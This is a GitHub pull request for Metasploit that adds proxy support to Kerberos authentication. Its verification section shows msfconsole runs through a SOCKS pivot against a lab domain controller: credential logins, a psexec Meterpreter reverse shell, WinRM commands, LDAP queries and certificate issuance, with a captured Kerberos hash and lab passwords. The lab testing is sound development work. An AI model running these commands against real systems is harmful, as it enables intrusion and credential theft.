Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add proxies datastore support for kerberos workflows #18096

Merged
merged 1 commit into from Jul 21, 2023
Merged

Add proxies datastore support for kerberos workflows #18096

merged 1 commit into from Jul 21, 2023

Conversation

adfoster-r7
Copy link
Contributor

@adfoster-r7 adfoster-r7 commented Jun 13, 2023
edited

Closes #18095

Verification

Machines:

  • 127.0.0.1 - Attacker VM
  • 192.168.123.144 - Pivot, socks5 proxy
  • 10.20.x.x - Remote DC3, not accessible to Attacker

Additionally ran on AttackerVM:

sudo iptables -A INPUT -d 10.20.0.0/24 -j DROP
sudo iptables -A OUTPUT -d 10.20.0.0/24 -j DROP

On the Pivot machine I just ran Metasploit's socks proxy module since it happened to have msfconsole installed

Test cases

  • Test kerberos login
msf6 auxiliary(scanner/kerberos/kerberos_login) > rerun rhost=10.20.0.128 username=administrator password=p4$$w0rd5 domaincontrollerrhost=10.20.0.128 domain=adf3.local proxies=socks5:192.168.123.144:1080
[*] Reloading module...

[*] Using domain: ADF3.LOCAL - 10.20.0.128:88       ...
[+] 10.20.0.128 - User found: "administrator" with password p4$$w0rd5. Hash: $krb5asrep$18$administrator@ADF3.LOCAL:bcf5caf4918d5b1a814869fd1bcf62ee$e6b8c6b2674ae8148a142eb7843a56bb4898aa840c02a9f84de13cad7bae70f8b8a8d2c008b63ff7e8005a5cda254086f7a2a86ba8160e37345ea7c2efa13db83f2acd1e6ab5af32b557d35b56b88425149017b3322acee312cbba22d3a42c13ddb683d720b07d3e1cb7ec9a13896181893465f521b799dfe46835eb80ecd2b97626549ce0b1194e29cfd117e9359ffd20f5a3d771905b9d062448ed16388d990bbb5ceb3f2d3c5971939d5fe200d638c8e4e19f503472d0c814c876854d64bffc2797e92f081738364a376b29e9dd58c8bcb36c00e5123a5f7cbe66241919e6f07001edadccff7b022aa3063a15cbf3d73765fbfd1b853ab26a99
[!] No active DB -- Credential data will not be saved!
[*] Auxiliary module execution completed
  • Test winrm_login shell
msf6 auxiliary(scanner/winrm/winrm_login) > rerun rhost=10.20.0.128 username=administrator password=p4$$w0rd5 winrm::auth=kerberos winrm::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.128 domain=adf3.local proxies=socks5:192.168.123.144:1080
[*] Reloading module...

[+] 10.20.0.128:88 - Received a valid TGT-Response
[*] 10.20.0.128:5985      - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230707060655_default_10.20.0.128_mit.kerberos.cca_628045.bin
[+] 10.20.0.128:88 - Received a valid TGS-Response
[*] 10.20.0.128:5985      - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230707060655_default_10.20.0.128_mit.kerberos.cca_605071.bin
[+] 10.20.0.128:88 - Received a valid delegation TGS-Response
[+] 10.20.0.128:88 - Received AP-REQ. Extracting session key...
[!] No active DB -- Credential data will not be saved!
[+] 10.20.0.128:5985 - Login Successful: adf3.local\administrator:p4$$w0rd5
[*] Command shell session 1 opened (192.168.123.132:39719 -> 192.168.123.144:1080) at 2023-07-07 06:06:56 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/winrm/winrm_login) > sessions

Active sessions
===============

  Id  Name  Type           Information                                    Connection
  --  ----  ----           -----------                                    ----------
  1         shell windows  WinRM administrator:p4$$w0rd5 (ADF3\administr  192.168.123.132:39719 -> 192.168.123.144:1080
                           ator)                                          (10.20.0.128)

msf6 auxiliary(scanner/winrm/winrm_login) > sessions -i -1 -c whoami
[*] Running 'whoami' on shell session -1 (10.20.0.128)
adf3\administrator
  • Test winrm_cmd
msf6 auxiliary(scanner/winrm/winrm_cmd) > rerun rhost=10.20.0.137 username=administrator password=p4$$w0rd5 winrm::auth=kerberos winrm::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.137 domain=adf3.local ReverseAllowProxy=true lhost=192.168.123.132  proxies=socks5:192.168.123.144:1080
[*] Reloading module...

[+] 10.20.0.137:88 - Received a valid TGT-Response
[*] 10.20.0.137:5985      - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710131847_default_10.20.0.137_mit.kerberos.cca_482709.bin
[+] 10.20.0.137:88 - Received a valid TGS-Response
[*] 10.20.0.137:5985      - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710131847_default_10.20.0.137_mit.kerberos.cca_664214.bin
[+] 10.20.0.137:88 - Received a valid delegation TGS-Response
[+] 10.20.0.137:88 - Received AP-REQ. Extracting session key...

Windows IP Configuration

   Host Name . . . . . . . . . . . . : dc3
   Primary Dns Suffix  . . . . . . . : adf3.local
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : adf3.local
                                       localdomain
  • Test smb login
msf6 auxiliary(scanner/smb/smb_login) > rerun rhost=10.20.0.137 username=administrator password=p4$$w0rd5 smb::auth=kerberos smb::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.137 domain=adf3.local ReverseAllowProxy=true lhost=192.168.123.132  proxies=socks5:192.168.123.144:1080
[*] Reloading module...

[*] 10.20.0.137:445       - 10.20.0.137:445 - Starting SMB login bruteforce
[+] 10.20.0.137:445       - 10.20.0.137:88 - Received a valid TGT-Response
[*] 10.20.0.137:445       - 10.20.0.137:445       - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710130833_default_10.20.0.137_mit.kerberos.cca_042215.bin
[+] 10.20.0.137:445       - 10.20.0.137:88 - Received a valid TGS-Response
[*] 10.20.0.137:445       - 10.20.0.137:445       - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710130836_default_10.20.0.137_mit.kerberos.cca_683880.bin
[+] 10.20.0.137:445       - 10.20.0.137:88 - Received a valid delegation TGS-Response
[+] 10.20.0.137:445       - 10.20.0.137:445 - Success: 'adf3.local\administrator:p4$$w0rd5' Administrator
[!] 10.20.0.137:445       - No active DB -- Credential data will not be saved!
[*] 10.20.0.137:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
  • Test psexec
msf6 exploit(windows/smb/psexec) > rerun rhost=10.20.0.137 username=administrator password=p4$$w0rd5 smb::auth=kerberos smb::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.137 domain=adf3.local ReverseAllowProxy=true lhost=192.168.123.132  proxies=socks5:192.168.123.144:1080
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.132:4444 
[*] 10.20.0.137:445 - Connecting to the server...
[*] 10.20.0.137:445 - Authenticating to 10.20.0.137:445|adf3.local as user 'administrator'...
[+] 10.20.0.137:445 - 10.20.0.137:88 - Received a valid TGT-Response
[*] 10.20.0.137:445 - 10.20.0.137:445 - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710130752_default_10.20.0.137_mit.kerberos.cca_594189.bin
[+] 10.20.0.137:445 - 10.20.0.137:88 - Received a valid TGS-Response
[*] 10.20.0.137:445 - 10.20.0.137:445 - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710130755_default_10.20.0.137_mit.kerberos.cca_385182.bin
[+] 10.20.0.137:445 - 10.20.0.137:88 - Received a valid delegation TGS-Response
[*] 10.20.0.137:445 - Selecting PowerShell target
[*] 10.20.0.137:445 - Executing the payload...
[+] 10.20.0.137:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175686 bytes) to 192.168.123.13
[*] Meterpreter session 6 opened (192.168.123.132:4444 -> 192.168.123.13:64956) at 2023-07-10 13:08:03 -0400

meterpreter >
  • Test MSSQL
  • Test LDAP - Kerberos tickets work (this PR) - but ldap_query client fails 馃敶 Will fix in a separate issue
msf6 auxiliary(gather/ldap_query) > rerun rhost=10.20.0.137 username=administrator password=p4$$w0rd5 ldap::auth=kerberos ldap::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.137 domain=adf3.local proxies=socks5:192.168.123.144:1080
[*] Reloading module...
[*] Running module against 10.20.0.137

[+] 10.20.0.137:88 - Received a valid TGT-Response
[*] 10.20.0.137:389 - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710120238_default_10.20.0.137_mit.kerberos.cca_426003.bin
[+] 10.20.0.137:88 - Received a valid TGS-Response
[*] 10.20.0.137:389 - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710120238_default_10.20.0.137_mit.kerberos.cca_291783.bin
[+] 10.20.0.137:88 - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] 10.20.0.137:389 Discovered base DN: DC=adf3,DC=local
[+] 10.20.0.137:389 Discovered schema DN: DC=adf3,DC=local
CN=Administrator CN=Users DC=adf3 DC=local
==========================================

 Name                Attributes
 ----                ----------
 badpwdcount         0
 description         Built-in account for administering the computer/domain
 lastlogoff          1601-01-01 00:00:00 UTC
 lastlogon           2023-07-10 16:02:38 UTC
  • Test ADCS
msf6 auxiliary(admin/ldap/ad_cs_cert_template) > rerun rhost=10.20.0.136 username=administrator password=p4$$w0rd5 ldap::auth=kerberos ldap::rhostname=dc3.adf3.local domaincontrollerrhost=10.20.0.136 domain=adf3.local proxies=socks5:192.168.123.144:1080
[*] Reloading module...
[*] Running module against 10.20.0.136

[+] 10.20.0.136:88 - Received a valid TGT-Response
[*] 10.20.0.136:389 - TGT MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710062038_default_10.20.0.136_mit.kerberos.cca_270545.bin
[+] 10.20.0.136:88 - Received a valid TGS-Response
[*] 10.20.0.136:389 - TGS MIT Credential Cache ticket saved to /home/kali/.msf4/loot/20230710062038_default_10.20.0.136_mit.kerberos.cca_801301.bin
[+] 10.20.0.136:88 - Received a valid delegation TGS-Response
[*] Discovering base DN automatically
[+] 10.20.0.136:389 Discovered base DN: DC=adf3,DC=local
[+] Read certificate template data for: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=adf3,DC=local
[*] Certificate template data written to: /home/kali/.msf4/loot/20230710062039_default_10.20.0.136_windows.ad.cs.te_131546.json
[*] Certificate Template:
[*]   distinguishedName: CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=adf3,DC=local
[*]   displayName:       User
[*]   objectGUID:        beea1d7d-241c-4b7d-a632-bac3ce1d3a9d
[*]   msPKI-Certificate-Name-Flag: 0xa6000000
[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_UPN
[*]     * CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL
[*]     * CT_FLAG_SUBJECT_REQUIRE_EMAIL
[*]     * CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
[*]   msPKI-Enrollment-Flag: 0x00000029
[*]     * CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS
[*]     * CT_FLAG_PUBLISH_TO_DS
[*]     * CT_FLAG_AUTO_ENROLLMENT
[*]   msPKI-Private-Key-Flag: 0x00000010
[*]     * CT_FLAG_EXPORTABLE_KEY
[*]   msPKI-RA-Signature: 0x00000000
[*]   pKIExtendedKeyUsage:
[*]     * 1.3.6.1.4.1.311.10.3.4
[*]     * 1.3.6.1.5.5.7.3.4
[*]     * 1.3.6.1.5.5.7.3.2
[+] The operation completed successfully!
[*] Auxiliary module execution completed

msf6 auxiliary(admin/dcerpc/icpr_cert) > run rhost=10.20.0.137 smbuser=foo_user smbpass=p4$$w0rd5 ca=adf3-DC3-CA CERT_TEMPLATE=User proxies=socks5:192.168.123.144:1080
[*] Running module against 10.20.0.137

[+] 10.20.0.137:445 - The requested certificate was issued.                                                                                                                                               
[*] 10.20.0.137:445 - Certificate UPN: foo_user@adf3.local                                                                                                                                                
[*] 10.20.0.137:445 - Certificate stored at: /home/kali/.msf4/loot/20230710123835_default_10.20.0.137_windows.ad.cs_608294.pfx                                                                            
[*] Auxiliary module execution completed

@adfoster-r7 adfoster-r7 force-pushed the add-proxies-datastore-support-to-kerberos branch 2 times, most recently from 521e5dd to e053e9e Compare June 13, 2023 23:58
@adfoster-r7 adfoster-r7 force-pushed the add-proxies-datastore-support-to-kerberos branch from e053e9e to 4287893 Compare June 14, 2023 12:30
@adfoster-r7 adfoster-r7 changed the title Add proxies datastore support to kerberos Add initial proxies datastore support for kerberos workflows Jul 7, 2023
@adfoster-r7 adfoster-r7 force-pushed the add-proxies-datastore-support-to-kerberos branch 3 times, most recently from 4a76d1a to 2751e5a Compare July 10, 2023 22:12
@adfoster-r7 adfoster-r7 marked this pull request as ready for review July 10, 2023 22:59
@adfoster-r7 adfoster-r7 force-pushed the add-proxies-datastore-support-to-kerberos branch from 2751e5a to 85fa1a7 Compare July 21, 2023 09:49
@adfoster-r7 adfoster-r7 force-pushed the add-proxies-datastore-support-to-kerberos branch from 85fa1a7 to 08a2a29 Compare July 21, 2023 10:20
@dwelch-r7 dwelch-r7 merged commit 1af22cf into rapid7:master Jul 21, 2023
33 of 34 checks passed
@dwelch-r7 dwelch-r7 added the rn-enhancement release notes enhancement label Jul 21, 2023
@dwelch-r7
Copy link
Contributor

dwelch-r7 commented Jul 21, 2023
edited by adfoster-r7

Release Notes

Updates the LDAP query module and the Kerberos authentication support for WinRM/MSSQL/SMB/LDAP/etc to now work in conjunction with the user's set Proxies datastore value, i.e. set Proxies socks5:127.0.0.1:1080

@adfoster-r7 adfoster-r7 mentioned this pull request Jul 21, 2023
Closed
@adfoster-r7 adfoster-r7 changed the title Add initial proxies datastore support for kerberos workflows Add proxies datastore support for kerberos workflows Jul 28, 2023
@adfoster-r7 adfoster-r7 mentioned this pull request Jan 9, 2024
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@sempervictus sempervictus sempervictus left review comments

@jmartin-tech jmartin-tech jmartin-tech left review comments

@dwelch-r7 dwelch-r7 dwelch-r7 left review comments

Assignees
No one assigned
Labels
rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

auxiliary/scanner/kerberos/kerberos_login doesn't respect Proxies
4 participants
@adfoster-r7 @dwelch-r7 @sempervictus @jmartin-tech